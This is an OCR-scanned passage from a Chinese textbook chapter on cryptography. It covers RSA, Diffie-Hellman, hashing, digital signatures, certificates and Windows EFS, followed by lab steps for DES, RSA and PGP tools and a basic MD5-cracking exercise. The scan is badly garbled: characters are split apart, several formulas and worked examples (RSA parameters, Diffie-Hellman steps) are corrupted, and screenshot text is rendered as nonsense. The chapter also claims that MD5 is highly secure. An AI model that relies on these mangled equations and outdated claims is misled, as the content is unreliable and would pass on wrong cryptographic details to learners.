使 等 式 7Xe (mod 20) = 1 成 立 的 7Xe 值 有 21、41、61、81、101… 所 以 选择 e = 3。 

对 原始 信息 P 加 密 : 即 计算 密 文 C = Ps(mod 33) ,使 用 公开 密 钥 为 (3,33) 。 

对 加 密 信息 C 解密 : 即 计算 明文 P = C' (mod 33) ,使 用 私有 密 钥 为 (7.33) 。 

P= 二 2: 二 33, 取 k 三 5, 即 用 5bit 表示 一 个 信息 ,有 32( 王 2 ) 种 表示 。 分 别 用 其 中 的 
1 一 26 表示 26 个 英文 字母 A 一 Z。 

如 明文 为 SUZANNE 可 表示 为 19 21 26 01 14 14 05。 

(2) RSA 安全 性 分 析 

RSA 的 保密 性 基于 一 个 数学 假设 :对 一 个 很 大 的 合 数 进行 质 因数 分 解 是 不 可 能 的 。 若 
RSA 用 到 的 两 个 质数 足够 大 ,可 以 保证 使 用 目前 的 计算 机 无 法 分 解 。 即 RSA 公开 密 钥 密 
码 体制 的 安全 性 取决 于 从 公开 密 钥 (>,e) 计算 出 私有 密 钥 (n,d) 的 困难 程度 。 想 要 从 公 
开 密 钥 (n,e) 算出 4d, 只 能 分 解 整数 的 因子 , 即 从 找 出 它 的 两 个 质 因数 p 和 g ,但 大 数 分 
解 是 一 个 十 分 困难 的 问题 。RSA 的 安全 性 取决 于 模 分 解 的 困难 性 ,但 数学 上 至 今 还 未 证 
明 分 解 模 就 是 攻击 RSA 的 最 佳 方法 。 尽 管 如 此 ,人 们 还 是 从 消息 破译 、 密 钥 空 间 选 择 等 角 
度 提 出 了 针对 RSA 的 其 他 攻击 方法 ,如 迭代 攻击 法 、 选 择 明文 攻击 法 、 公 用 模 攻 击 、 低 加 密 
指数 攻击 、 定 时 攻击 法 等 ,但 其 攻击 成 功 的 概率 微乎其微 。 

出 于 安全 考虑 ,建议 在 RSA 中 使 用 1024 位 的 ,对 于 重要 场合 应 该 使 用 2048 位 。 
128 


项 目 5 密码 技术 


3. Diffie -Hellman 算法 


1976 年 ,Diffie 和 Hellman 首次 提出 了 公开 密 钥 算法 的 概念 ,也 正 是 他 们 实现 了 第 一 个 
公开 密 钥 算法 一 一 Diffie -Hellman 算法 。Diffie -Hellman 算法 的 安全 性 源 于 在 有 限 域 上 计 
算 离散 对 数 比 计算 指数 更 为 困难 。 

Diffie -Hellman 算法 的 思路 是 :首先 必须 公布 两 个 公开 的 整数 n 和 g,n 是 大 素数 ,g 是 
模 n 的 本 原 元 。 当 Alice 和 Bob 要 作 秘 密 通 信 时 . 则 执行 以 下 步骤 。 

OD Alice 秘密 选取 一 个 大 的 随机 数 z(z 一 z) ,计算 X 一 g”mod n, 并 且 将 XX 发送 
给 Bob。 

@ Bob 秘密 选取 一 个 大 的 随机 数 y(y 二 xz) ,计算 了 = g”mod n, 并 且 将 Y 发 送 给 
Alice。 

@ Alice 计算 & = Y* mod n。 

@ Bob 计 算 k= XY modn。 

这 里 和 k' 都 等 于 g”mod n。 因 此 就 是 Alice 和 Bob 独立 计算 的 秘密 密 钥 。 

从 上 面 的 分 析 可 以 看 出 ,Diffie-Hellman 算法 仅 限于 密 钥 交 换 的 用 途 , 而 不 能 用 于 加 密 
或 解密 ,因此 该 算法 通常 称 为 Diffie-Hellman 密 钥 交换 算法 。 这 种 密 钥 交 换 的 日 的 在 于 使 
两 个 用 户 安全 地 交换 一 个 秘密 密 钥 以 便于 以 后 的 报 文 加 密 。 

其 他 的 常用 公开 密 钥 算法 还 有 DSA 算法 (数字 签名 算法 ) .ElIGamal 算法 等 。 

非 对 称 加 密 和 对 称 加 密 各 有 特点 ,适用 于 不 同 的 场合 ,两 者 的 对 比如 表 5-2 所 示 。 


表 5-2 对称 加 密 和 非 对 称 加 密 的 比较 


特性 对 称 加 密 非 对 称 加 密 
密 钥 的 数量 单一 密 钥 密 钥 是 成 对 的 
密 钥 种 类 密 钥 是 秘密 的 一 个 公开 ,一 个 私有 
密 钥 管理 不 好 管理 需要 数字 证 书 及 可 靠 第 三 者 
加 解密 速度 非常 快 慢 
用 途 大 量 信息 的 加 密 少量 信息 的 加 密 、 数 字 签名 等 


5.3.5 单 向 散 列 算 法 


使 用 公 钥 加 密 算法 对 信息 进行 加 密 是 非常 耗 时 的 ,因此 加 密 人 员 想 出 了 一 种 办 法 来 快 
速生 成 一 个 能 代表 发 送 者 消息 的 简短 而 独特 的 消息 摘要 ,这 个 摘要 可 以 被 加 密 并 作为 发 送 
者 的 数字 签名 。 

通常 ,产生 消息 摘要 的 快速 加 密 算法 称 为 单 向 散 列 函数 (Hash 函数 )。 单 向 散 列 函 数 
不 使 用 密 钥 , 它 只 是 一 个 简单 的 函数 ,把 任何 长 度 的 一 个 消息 转化 为 一 个 叫做 消息 摘要 的 简 
单 的 字符 串 。 

消息 摘要 的 主要 特点 如 下 。 

中 无 论 输入 的 消息 有 多 长 ,计算 出 来 的 消息 摘要 的 长 度 总 是 固定 的 。 例 如 应 用 MD5 
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算法 产生 的 消息 摘要 有 128 比特 位 ,用 SHA/SHA-1 算法 产生 的 消息 摘要 有 160 比特 位 ， 
SHA/SHA-1 算法 的 变 体 可 以 产生 256、384 和 512 比特 位 的 消息 摘要 。 一 般 认为 ,摘要 的 
最 终 输出 越 长 ,该 摘要 算法 就 越 安全 。 

@ 消息 摘要 看 起 来 是 “随机 的 ”>。 这 些 比 特 看 上 去 是 胡乱 地 杂凑 在 一 起 的 。 可 以 用 大 
量 的 输入 来 检验 其 输出 是 否 相 同 ,一 般 不 同 的 输入 会 有 不 同 的 输出 。 但 是 ,一 个 消息 摘要 并 
不 是 真正 随机 的 ,因为 用 相同 的 算法 对 相同 的 消息 求 两 次 摘要 ,其 结果 必然 相同 ;而 若是 真 
正 随机 的 , 则 无 论 如 何 都 是 无 法 重 现 的 。 因 此 消息 摘要 是 “ 伪 随 机 的 ”。 

@ 一 般 的 ,只 要 输入 的 消息 不 同 ,对 其 进行 摘要 以 后 产生 的 摘要 消息 也 必 不 相同 ;但 相 
同 的 输入 必 会 产生 相同 的 输出 。 这 正 是 好 的 消息 摘要 算法 所 具有 的 性 质 :输入 改变 了 ,输出 
也 就 改变 了 ;两 条 相似 的 消息 的 摘要 并 不 相近 ,甚至 会 大 相 径 庭 。 

@ 消息 摘要 函数 是 单 向 函数 , 即 只 能 进行 正 向 的 消息 摘要 ,而 无 法 从 摘要 中 恢复 出 任 
何 的 消息 ,甚至 根本 就 找 不 到 任何 与 原 信息 相关 的 信息 。 

因此 ,消息 摘要 可 以 用 于 完整 性 校 验 ,验证 消息 是 否 被 修改 或 伪造 。 


5.3.6 数字 签名 技术 


随 着 计算 机 网 络 的 发 展 , 电 子 商 务 .电子 政务 .电子 金融 等 系统 得 到 了 广泛 应 用 ,在 网 络 
传输 过 程 中 ,通信 双方 可 能 存在 一 些 问题 。 信 息 接收 方 可 以 伪造 一 份 消息 ,并 声称 是 由 发 送 
方 发 送 过 来 的 ,从 而 获得 非法 利益 ;同样 ,信息 的 发 送 方 也 可 以 否认 发 送 过 来 的 消息 ,从 而 获 
得 非法 利益 。 因 此 .在 电子 商务 中 , 某 一 个 用 户 在 下 订单 时 ,必须 能 够 确认 该 订单 确实 为 用 
户 自己 发 出 ,而 非 他 人 伪造 ;另外 ,在 用 户 与 商家 发 生 争执 时 ,也 必须 存在 一 种 手段 ,能 够 为 
双方 关于 订单 进行 仲裁 。 这 就 需要 一 种 新 的 安全 技术 来 解决 通信 过 程 中 引起 的 争端 ,由 此 
出 现 了 对 签名 电子 化 的 需求 , 即 数字 签名 技术 (Digital Signature) 。 

使 用 密码 技术 的 数字 签名 正 是 一 种 作用 类 似 于 传统 的 手写 签名 或 印章 的 电子 标记 , 因 
此 使 用 数字 签名 能 够 解决 通信 双方 由 于 否认 、 伪 造 、 冒 充 和 算 改 等 引起 的 争端 。 数字 签名 的 
日 的 就 是 认证 网 络 通信 双方 身份 的 真实 性 ,防止 相互 欺骗 或 抵赖 。 数 字 签 名 是 信息 安全 的 
又 一 重要 研究 领域 ,是 实现 安全 电子 交易 的 核心 之 一 。 


1. 数字 签名 的 基本 原理 


鉴别 文件 或 书信 和 真 伪 的 传统 做 法 是 亲笔 签名 或 盖 章 。 签 名 起 到 认证 、 核 准 . 生 效 的 作用 。 
电子 商务 .电子 政务 等 应 用 要 求 对 电子 文档 进行 辨认 和 验证 ,因而 产生 了 数字 签名 。 数 字 签 名 
既 可 以 保证 信息 完整 性 ,也 可 以 提供 信息 发 送 者 的 身份 认证 。 发 送 者 对 所 发 信息 不 能 抵赖 。 

在 发 送 方 ,将 消息 按 双方 约定 的 单 向 散 列 算法 计算 得 到 一 个 固定 位 数 的 消息 摘要 ,在 数 
学 上 保证 :只 要 改动 消息 的 任何 一 位 ,重新 计算 出 来 的 消息 摘要 就 会 与 原先 不 符 , 这 样 就 保 
证 了 消息 的 不 可 更 改 。 然 后 把 该 消息 摘要 用 发 送 者 的 私 钥 加 密 . 并 将 密 文 同 原 消 息 一 起 发 
送 给 接收 者 ,所 产生 的 消息 即 为 数字 签名 。 

接收 方 收 到 数字 签名 后 ,用 同样 的 单 向 散 列 算法 对 消息 计算 摘要 ,然后 与 用 发 送 者 公 钥 
进行 解密 得 到 的 消息 摘要 相 比 较 , 如 果 两 者 相等 , 则 说 明 消息 确实 来 自发 送 者 ,并 且 消 息 是 
真实 的 ,因为 只 有 用 发 送 者 的 签名 私 钥 加 密 的 信息 才能 用 发 送 者 的 公 钥 进行 解密 ,从 而 保证 
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了 消息 的 真实 性 和 发 送 者 的 身份 。 
2. 举例 说 明 
下 面 以 Alice 和 Bob 的 通信 为 例 来 说 明 数 字 签 名 的 过 程 , 如 图 5-11 所 示 。 


散 列 函数 


1 
| 


A 的 私 钥 ; [的 公 铀 


Alice 进 行 签名 Bob 验 证 签名 


图 5-11 利用 公开 密 钥 密码 技术 的 数字 签名 


加 Alice 用 单 向 散 列 函 数 对 要 传送 的 消息 (明文 ) 计 算 消 息 摘 要 。 

@ Alice 用 自己 的 私 钥 对 消息 摘要 进行 加 密 . 得 到 加 密 的 消息 摘要 。 

@ Alice 将 消息 (明文 ) 和 加 密 的 消息 摘要 一 起 发 送 给 Bob, 作 为 数字 签名 。 

@ Bob 收 到 数字 签名 (消息 十 加 密 的 摘要 ) 后 ,用 相同 的 单 向 散 列 函 数 对 消息 (明文 ) 计 
算 消 息 摘要 。 

@ Bob 用 Alice 的 公 钥 对 加 密 的 消息 摘要 进行 解密 。 

@ Bob 将 自己 计算 得 到 的 消息 摘要 与 解密 得 到 的 消息 摘要 进行 比较 .如 果 相 同 , 说 明 
签名 是 有 效 的 。 和 否则 说 明 消 息 不 是 Alice 发 送 的 ,或 者 消息 有 可 能 被 算 改 。 

在 图 5-11 中 ,Bob 接收 到 的 消息 是 未 加 密 的 .如 果 消 息 本 身 需要 保密 ,Alice 发 送 前 可 
用 Bob 的 公 钥 对 数字 签名 (消息 十 加 密 的 摘要 ?进行 加 密 ,Bob 接收 后 , 先 用 自己 的 私 钥 进 
行 解密 ,然后 再 验证 数字 签名 。 

由 上 可 见 ,数字 签名 可 以 保证 以 下 几 点 。 

@ 可 验证 :数字 签名 是 可 以 被 验证 的 。 

@ 防 抵 赖 :防止 发 送 者 事后 不 承认 发 送 消息 并 签名 。 

@ 防 假冒 :防止 攻击 者 冒充 发 送 者 向 接收 方 发 送 消息 。 

@ 防 算 改 :防止 攻击 者 或 接收 方 对 收 到 的 信息 进行 自 改 。 

@ 防伪 造 :防止 攻击 者 或 接收 方 伪造 对 消息 的 签名 。 


5.3.7 数字 证 书 


数字 证 书 (Digital Certificate) 又 称 数字 标识 (Digital ID) ,是 用 来 标志 和 证 明 网 络 通 信 
双方 身份 的 数字 信息 文件 。 数 字 证 书 一 般 由 权威 .公正 的 第 三 方 机 构 即 CA (Certificate 
Authority, 数 字 证 书 认证 中 心 ) 中 心 签 发 :包括 一 串 含 有 客户 基本 信息 及 CA 签名 的 数字 编 
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码 。 在 网 上 进行 电子 商务 活动 时 ,交易 双方 需要 使 用 数字 证 书 来 表明 自己 的 身份 ,并 使 用 数 
字 证 书 来 进行 有 关 的 交易 操作 。 通 俗 地 讲 , 数 字 证 书 就 是 个 人 或 单位 在 互联 网 的 身份 证 。 

数字 证 书 主要 包括 三 方面 的 内 容 :证 书 所 有 者 的 信息 、 证 书 所 有 者 的 公开 密 钥 和 证 书 颁 
发 机 构 的 签名 。 

一 个 标准 的 X. 509 数字 证 书包 含 (但 不 限于 ) 以 下 内 容 。 

吕 证 书 的 版 本 信息 。 

@ 证 书 的 序列 号 ,每 个 证 书 都 有 一 个 唯一 的 证 书 序列 号 。 

@ 证 书 所 使 用 的 签名 算法 。 

@ 证 书 的 发 行 机 构 名 称 (命名 规则 一 般 采 用 X. 500 格式 ) 及 其 私 钥 的 签名 。 

@@ 证 书 的 有 效 期 。 

@ 证 书 使 用 者 的 名 称 及 其 公 钥 的 信息 。 


5.3.8 EFS 加 密 文件 系统 


EFS(Encrypting File System, 加 密 文 件 系统 ) 是 Windows 系统 中 的 一 项 功能 ,针对 
NTFS 分 区 中 的 文件 和 数据 ,用 户 都 可 以 直接 加 密 , 从 而 达到 快速 提高 数据 安全 性 的 日 的 。 

EFS 加 密 基 于 公 钥 策略 。 在 使 用 EFS 加 密 一 个 文件 或 文件 夹 时 ,系统 首先 会 生成 一 个 
由 伪 随 机 数组 成 的 FEK(File Encryption Key ,文件 加 密 钥 匙 ) ,然后 将 利用 FEK 和 数据 扩 
展 标 准 X 算 法 创建 加 密 后 的 文件 并 进行 存储 ,同时 删除 原始 文件 。 然 后 系统 会 利用 公 钥 加 
密 FEK, 并 把 加 密 后 的 FEK 存储 在 同一 个 加 密 文 件 中 。 而 在 访问 被 加 密 的 文件 时 ,系统 首 
先 利 用 当前 用 户 的 私 钥 解 密 FEK ,然后 利用 FEK 解密 出 文件 。 在 首次 使 用 EFS 时 ,如 果 用 
户 还 没有 公 钥 / 私 钥 对 (统称 为 密 钥 ), 则 会 首先 生成 密 钥 .然后 加 密 数据 。 如 果 用 户 登录 到 
了 域 环境 中 , 则 密 钥 的 生成 依赖 于 域 控 制 器 ,否则 依赖 于 本 地 机 器 。 

由 于 重 装 系 统 后 ,SID( 安 全 标识 符 ) 的 改变 会 使 原来 由 EFS 加 密 的 文件 无 法 打开 ,所 以 为 
了 保证 别人 能 共享 EFS 加 密 文件 或 者 重 装 系 统 后 可 以 打开 EFS 加 密 文件 ,必须 备份 证 书 。 

EFS 加 密 文件 系统 对 用 户 是 透明 的 。 也 就 是 说 ,如 果 用 户 加 密 了 一 些 数据 ,那么 用 户 
对 这 些 数据 的 访问 将 是 完全 允许 的 .并 不 会 受到 任何 限制 。 而 其 他 非 授权 用 户 试图 访问 加 
密 过 的 数据 时 ,就 会 收 到 “拒绝 访问 ”的 错误 提示 。EFS 加 密 的 用 户 验 证 过 程 是 在 登录 
Windows 时 进行 的 ,只 要 登录 到 Windows, 就 可 以 打开 任何 一 个 被 授权 的 加 密 文件 。 

使 用 EFS 加 密 文件 或 文件 夹 时 ,要 注意 以 下 几 个 方面 。 

只 有 NTFS 格式 的 分 区 才 可 以 使 用 EFS 加 密 技术 。 

@ 第 一 次 使 用 EFS 加 密 后 应 及 时 备份 密 钥 。 

@ 如 果 将 未 加 密 的 文件 复制 到 具有 加 密 属性 的 文件 夹 中 .这 些 文件 将 会 被 自动 加 密 。 
若是 将 加 密 数据 移出 来 则 有 两 种 情况 :车 移动 到 NTFS 分 区 上 ,数据 依旧 保持 加 密 属性 ; 若 
移动 到 FAT32 分 区 上 ,这 些 数据 将 会 被 自动 解密 。 

@ 被 EFS 加 密 过 的 数据 不 能 在 Windows 中 直接 共享 。 

@ NTFS 分 区 中 加 密 和 压缩 功能 不 能 同时 使 用 。 

@ Windows 系统 文件 和 文件 夹 无 法 被 加 密 。 
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54 项 目 实施 


5.4.1 任务 1:DES、RSA 和 Hash 算法 的 实现 


1. 任务 目标 


(1) 掌握 常用 加 密 处 理 软 件 的 使 用 方法 。 
(2) 理解 DES、RSA 和 Hash 算法 的 原理 。 
(3) 了 解 MD5 算法 的 破解 方法 。 


2. 任务 内 容 


(1) 对 称 加 密 算法 DES 的 实现 。 
(2) 非 对 称 加 密 算法 RSA 的 实现 。 
(3) Hash 算法 的 实现 与 MD5 算法 的 破解 。 


3. 完成 任务 所 需 的 设备 和 软件 


(1) 装 有 Windows XP/2003 操作 系统 的 PC 1 台 。 
(2) MixedCS、 RSATool.DAMN_HashCalc.MD5Crack 工具 软件 各 1 套 。 


4. 任务 实施 步骤 


(1) 对 称 加 密 算 法 DES 的 实现 

DES 算法 属于 对 称 加 密 算 法 , 即 加 密 和 解密 使 用 同一 个 密 钥 。DES 算法 有 一 个 致命 
的 缺陷 就 是 密 钥 长 度 短 . 只 有 56 位 ,对 于 当今 飞速 发 展 的 计算 机 技术 ,已 经 抵挡 不 住 穷 
举 破 解 ,一 个 改进 的 算法 就 是 三 重 DES 算法 (3DES) ,可 使 密 钥 长 度 扩 展 到 112 位 或 
168 位 。 

步骤 1: 双击 运行 MixedCS. exe 程序 ,打开 的 程序 主 界面 如 图 5-12 所 示 。 

步骤 2: 单 击 “ 浏 览 文件 ”按钮 ,选择 要 进行 DES 加 密 的 源 文件 ,如 “D:\1. jpg” 文 件 , 选 
择 完成 后 在 “输出 文件 ”文本 框 中 会 自动 出 现 默认 的 加 密 后 的 文件 名 ,如 “D:\1. jpg. des”。 

步骤 3: 选中 “DES 加 密 ” 单 选 按钮 ,在 “DES 密 钥 ” 文 本 框 中 输入 5 个 字符 (区 分 大 小 
写 ) 作 为 密 钥 ,在 “确认 密 钥 "文本 框 中 重新 输入 相同 的 5 个 字符 。 

步骤 4: 单 击 “ 加 密 ” 按 钮 ,弹出 “ 真 的 要 进行 该 操作 吗 ?” 的 提示 信息 , 单 击 “ 是 ”按钮 , 稍 
修 出 现 “ 加 密 成 功 ! 用 时 2 秒 ” 的 提示 信息 ,如 图 5-13 所 示 。 

步骤 5: 将 密 钥 长 度 改 为 10 个 字符 ,重新 进行 加 密 , 此 时 软件 将 自动 采用 3DES 算法 进 
行 加 密 , 可 以 看 出 加 密 的 时 间 明 显 增加 了 ,如 图 5-14 所 示 。 
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图 5-14 用 3DES 算法 进行 加 密 


步骤 6: 单 击 “ 浏 览 文件 ”按钮 ,选择 已 加 密 文件 “D:\1. jpg. des”, 并 把 “输出 文件 ”修改 
为 “D:\2.jpg”, 密 钥 保 持 不 变 , 单 击 “ 解 密 ” 按 钮 进行 解密 ,如 图 5-15 所 示 , 验 证 1. jpg 和 
2.jpg 文 件 内 容 是 否 一 致 

(2) 非 对 称 加 密 算法 RSA 的 实现 

@ 回顾 RSA 的 实现 原理 
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第 入 /第 出 


1 和 和 A Dr pe 


多 出 文件 [2 PE 


图 5-15 用 3DES 加 密 算 法 进行 解密 


选择 两 个 大 素数 p 和 4g。 

计算 n=p*gqg 和 z=(p 一 1)X(g 一 1)。 
选择 一 个 与 = 互 素 (没有 公 因 子 ) 的 数 d。 
. 找到 ,使 其 满足 e* d=1 modz=。 

公 钥 为 (e.n) ,而 私 钥 为 Cd ,n)。 

@ 实例 说 明 

. 选择 两 个 大 素数 p= 二 17 和 gq 二 47。 


rerngyrp 


. 选择 一 个 与 互 素 的 数 d 二 589。 

. 找到 e=5, 满 足 e* d=1 modz。 

e. 公 钥 为 (5,799) ,而 私 钥 为 (589,799)。 
@ 非 对 称 加 密 算法 RSA 的 实现 


a 
b. 计算 "= 王 17X47 王 799 ,计算 = 一 (17 一 1) X(47 一 1) 一 736 。 
c. 
d 


步骤 1: 双击 运行 RSATool2v17. exe 程序 ,打开 的 程序 主 界面 如 图 5-16 所 示 。 
步骤 2: 在 Number Base 下 拉 框 中 选择 10 选项 ,作为 数 制 ,在 Public Exponent 文本 框 


中 输入 数字 5 ,在 1st Prime 文本 框 中 输入 数字 17 ,在 2nd Prime 文本 框 中 输入 数字 47 。 
步骤 3: 单 击 Calc. D 按钮 , 则 计算 出 zx( = 一 799) 和 <(= 一 589) 。 


步骤 4: 在 Number Base 下 拉 框 中 选择 10 选项 ,在 Public Exponent 文本 框 中 输入 数 


字 10001 ,再 单 击 窗口 左上 和 角 的 Start 按钮 ,系统 自动 产生 随机 数 ; 再 单 击 窗口 左下 角 的 
Generate 按钮 . 则 会 产生 出 两 个 大 素数 p 和 g 以 及 n 和 d. 如 图 5-17 所 示 。 


步骤 5: 单 击 窗口 左下 角 的 Test 按钮 .打开 RSA-Test 对 话 框 ,可 进行 加 解密 测试 。 
步骤 6: 在 Message to encrypt 文本 框 中 输入 一 个 数 ,如 256, 然 后 单 击 Encrypt 按钮 进 


行 加 密 , 密 文 显示 在 Ciphertext 文本 框 中 ,如 图 5-18 所 示 。 
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Keysce Bas) 一 
Ps 
2 


Pubtc Exponent E) HE 


Mosuus m [E] 
9 


Prvate Exponent (0) 
E23 


Factorng nto (Prme factors 


ExR 


厂 use MPas method only 厂 No tme checks 
Ready. To create RSA Keys, press >Start< now tO generate some random data- 一 


图 5-16 ”RSA 密 钥 的 计算 


Keysce (Bts) 
EE 


Publc Exponent (E) [HE 


et Prme (P) 
6186575793377537722919842701430233323 


nd Prme (o 
41915980493478391749827772218614591027 


255 Bes 


Moduus 00 [E] 
S31221630418292910826408655133157927099360230170698002615501587681820832192721 


Prvate Exponent (0) 
47357397960818108148141969820937056788580214529671782010638799165542834202773 


Factorng nto (Prme factors 


[ Use MPas method ony 厂 No tme checks 
Done. You can test your keys right now- 


图 5-17 自动 产生 RSA 密 钥 


步骤 7: 单 击 Decrypt 按钮 ,进行 解密 ,解密 后 的 明文 (256) 显 示 在 Ciphertext 文本 框 
中 ,如 图 5-19 所 示 。 可 见 , 加 密 前 的 原文 (256) 和 解密 后 的 明文 (256) 是 一 致 的 。 

(3) Hash 算法 的 实现 与 MD5 算法 的 破解 

Hash 函数 ( 单 向 散 列 函数 ) 的 计算 过 程 : 输 入 一 个 任意 长 度 的 字符 串 .返回 一 串 固定 长 
度 的 字符 串 ( 消 息 摘 要 ) 。 消 息 摘要 常用 于 数字 签名 .身份 验证 、 验 证 数据 完整 性 等 。 

步骤 1: 双击 运行 DAMN_HashCalc. exe 程序 .打开 程序 主 界面 。 
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Nessage tt encnpt 


Message ninencnypt 
2 


Max Eng (cnars) of message can be KeysceiBh1 to meke sure hat Hi < 


Coheriext (CY 


75549088668072609315594361971780715907121622371208385 
504493328212804 


图 5-18 RSA 加 密 测 试 图 5-19 RSA 解密 测试 


步骤 2: 选中 160 和 MD5 复 选 框 ,取消 选中 其 他 复 选 框 ,选中 Text 单 选 按钮 ,并 在 其 后 
的 文本 框 中 输入 字符 串 123456789 ,然后 按 Enter 键 ,运算 结果 如 图 5-20 所 示 。 

步骤 3: 将 文本 框 中 的 字符 串 改 为 1234567890, 然 后 按 Enter 键 ,运算 结果 如 图 5-21 所 示 。 
请 比较 这 两 幅 图 中 计算 结果 的 异同 点 。 

步骤 4: 运行 MD5 的 破解 软件 MD5Crack ,并 将 字符 串 123456789 的 MD5 值 复制 到 破 
解 软 件 MD5Crack 窗口 中 的 “破解 单个 密 文 "文本 框 中 ,设置 字符 集 为 “数字 ”, 单 击 “ 开 始 ” 
按钮 进行 破解 ,如 图 5-22 所 示 。 

由 于 原来 的 MD5 明文 都 是 数字 并 且 比 较 简单 ,破解 将 很 快 完成 。 如 果 MD5 明文 既 有 
数字 又 有 字母 ,破解 将 花费 相当 长 的 时 间 , 这 进一步 说 明了 MD5 算法 有 较 高 的 安全 性 。 

步骤 5: DAMN_HashCalc. exe 程序 还 能 对 文件 进行 Hash 运算 ,请 读者 自行 练习 。 


Ey J 
Pimra Fm er 


图 5-21 字符 串 1234567890 的 运算 结果 


eT 


GT NE 


OWNWSTEx 至 


< 


Dxs¥ 


DBsx 


图 5-22 使 用 MD5Crack 破解 MD5 明文 
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5.4.2 任务 2: PGP 软件 的 使 用 


1. 任务 目标 


(1) 掌握 PGP 软件 的 使 用 方法 。 
(2) 掌握 用 PGP 软件 进行 文件 或 邮件 的 加 密 和 签名 。 
(3) 理解 数字 签名 的 原理 。 


2. 任务 内 容 


(1) PGP 软件 的 安装 。 

(2) PGP 软件 的 配置 。 

(3) 密 钥 的 导出 与 导入 。 

(4) PGP 文件 的 加 密 和 解密 。 

(5) 电子 邮件 的 加 密 、 解 密 和 签名 验证 。 


3. 完成 任务 所 需 的 设备 和 软件 


(1) 装 有 Windows XP/2003 操作 系统 的 PC 2 台 。 
(2) PGP 软件 1 套 。 


4. 任务 实施 步骤 


PGP 软件 的 版 本 种 类 有 很 多 ,下 面 以 PGP Desktop 10. 1. 1 版 本 为 例 ,介绍 PGP 软件 
的 使 用 方法 。 

(1) PGP 软件 的 安装 

步骤 1: 双击 运行 PGP 安装 程序 pgp1011. exe, 打 开 安 装 界 面 ,如 图 5-23 所 示 。 

步骤 2: 单 击 “ 简 体 中 文 ”按钮 ,在 弹出 的 “许可 证 协议 "对话 框 中 ,选中 “我 接受 该 许可 证 
协议 ” 单 选 按钮 ,如 图 5-24 所 示 。 


refuly read the fplowng legal agreet D for the lcense of POP® 
Upgn 


Jsomware you are about 
sah defnea 


download or nstal ay Updates and 
below) prongeg, he "Som 


ware7 and ne 前 


图 5-23 选择 “简体 中 文 ”语言 图 5-24 “许可 证 协议 "对话 框 


步骤 3: 单 击 “ 下 一 步 ” 按 钮 ,在 弹出 的 “显示 发 行 说 明 ” 对 话 框 中 ,选中 “不 显示 发 行 说 
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明 ? 单 选 按钮 ,如 图 5 示 。 


步骤 4: 单 击 “ 下 一 步 ? 按 钮 ,安装 程序 安装 完成 后 ,询问 是 和 否 要 条 
图 5-26 所 示 , 单 击 “ 是 ” 按 负重 新 启动 计算 机 . 


新 启动 计算 机 ,如 


则 PP Desktop 安装 程序 
显示 发 行 说 明 


改行 说明 提供 了 重要 信息 - 


绝 可 以 过 择 显示 改行 说 明 惑 间 机 下 
圭 安 村 下 面 的 项。 向 
eol 


您 各 须 重新 咎 动 系统 才能 全 对 Pp Desktop 他 出 的 可 轩 做 织 
ES 入 可 立 色 重新 局 动 ; 单机 省 控 渍 则 可 在 
避 后 以 人工 方式 局 动 。 


口 显示 发 行 说 咀 


Ca rr Cn] 


图 5-25 “显示 发 行 说 明 ” 对 话 框 图 5-26 重新 启动 计算 机 
(2) PGP 软件 的 配置 
步骤 1: 重新 启动 计算 机 后 ,会 自动 打开 “PGP 设置 助手 ”向 导 , 如 图 5-27 所 示 。 
步骤 2: 选中 “是 ” 单 选 按钮 ,表示 人 允许 当前 Windows 系统 账户 启用 PGP 软件 。 然 后 单 
击 “ 下 一 步 " 按 钮 .进入 “启用 许可 的 功能 "界面 ,如 图 5-28 所 示 。 


局 用 Pop 
不 打算 从 此 张 户 使 用 PGP ， 便 设 必要 施 成 也 置 向 导 。 如 果 您 以 后 改 去 主音， 只 
re 
a 黎 要 从 此 隆 户 局 用 PP 以 让 其 可 用 ? 


Om 
ON@ 


E253 Cw Cm) 


图 5-27 “PGP 设置 助手 ”向 导 


步骤 3: 在 如 图 5-28 所 示 的 界面 中 输入 用 户 的 名 称 、 a 4 和 电子 邮件 地 址 ,然后 
单 击 “ 下 一 步 ” 按 钮 ,进入 “输入 许可 证 ”界面 ,如 图 5-29 所 示 ,选中 * 输 入 您 的 许可 证 号 码 ” 单 
选 按钮 ,并 在 下 面 的 文本 框 中 输入 PGP 许可 证 号 码 。 
步骤 4: 单 击 “ 下 一 步 " 按 钮 .进入 “授权 成 功 ” 界 面 .如 图 5-30 所 示 。 


步骤 5: 单 击 “ 下 一 步 ” 按 钮 .进入 “用 户 类 型 "界面 .如 图 5-31 所 示 . 选 中 “我 是 一 个 新 用 
户 ” 单 选 按 钮 。 
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许可 助手 : 局 用 许可 的 功能 


款 放 可 玫 号 管 信 cepz 驼 开 甩 并 祛 关 了 玉里 输入 的 名 字 ,组织 和 部 性 雹 址 。 
加 果 纪 先前 已 和 用 过 你 的 计 林 证 ,保证 荣 入 信息 和 先 胡 的 一 笠 


0 
超 织 0) : [uv 
半 伯 地址 (ED) : wal eviyealen cm 
三才 全 怒 直 ( 品 :wnal ria21cn ce 


图 5-28 “启用 许可 的 功能 "界面 


许可 助手 : 输入 许可 证 


Enker the enee number recetved for your prrchase or upgrade below Hf you do 
nok have a heense rumber, you may use the prodxt wth most feotures disabled, 
You may ds Select hes ootion to ert 区 ee Mmber ot 8 ator tne 
局 用 用 户 
许可 
新 建 用 户 
密 钥 生成 OAT 
全 球 名 录 
消息 [2 
风 加 特 狂 


〇 不便 用 许可 证 并 条 用 多 汰 功能 


图 5-29 “输入 许可 证 ”界面 


许可 证 闫 型 :全 业 这 全 版 
许可 证 度 位 : 不 限 
许可 证 到 其 地 不 


pe 
3 


民生 和 动 到 四 标 上 学 习 关 于 PeP Dedtop 的 每 个 功能 


CE wr. | 


图 5-30 “授权 成 功 ” 界 面 
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PCP 设置 助手 


用 户 类 型 


lake 此 助手 稳 家 扣 多 配置 PeP 并 初 由 化 作 的 在 铀 。 


天 一 个 
加 要 划一 下 租用 FJ 
〇 和 先前 使 用 过 PP 并且 要 已 经 有 过 铀 站。 


图 5-31 “用 户 类 型 "界面 


步骤 6: 单 击 “ 下 一 步 "按钮 ,进入 “PGP 密 钥 生成 助手 "界面 ,如 图 5-32 所 示 。 


PoP 设置 助手 
PGP 密 钥 生 成 助手 


此 勋 手 梅 帮助 和 生成 一 个 新 的 P 杞 钥 。 一 个 角 需 要 每 个 参与 痢 有 一 个 安全 
是 请 环 。 当 便 用 宰 银 自 建 PGF 文 档 和 Fcp 击 多 时 ， 也 和 提供 最 高 程度 的 信 利 


的 昌 G 要 更 多 关于 字 胃 和 Pop 怎么 工作 的 信息， 请 人 op edtop 的 晴 助 


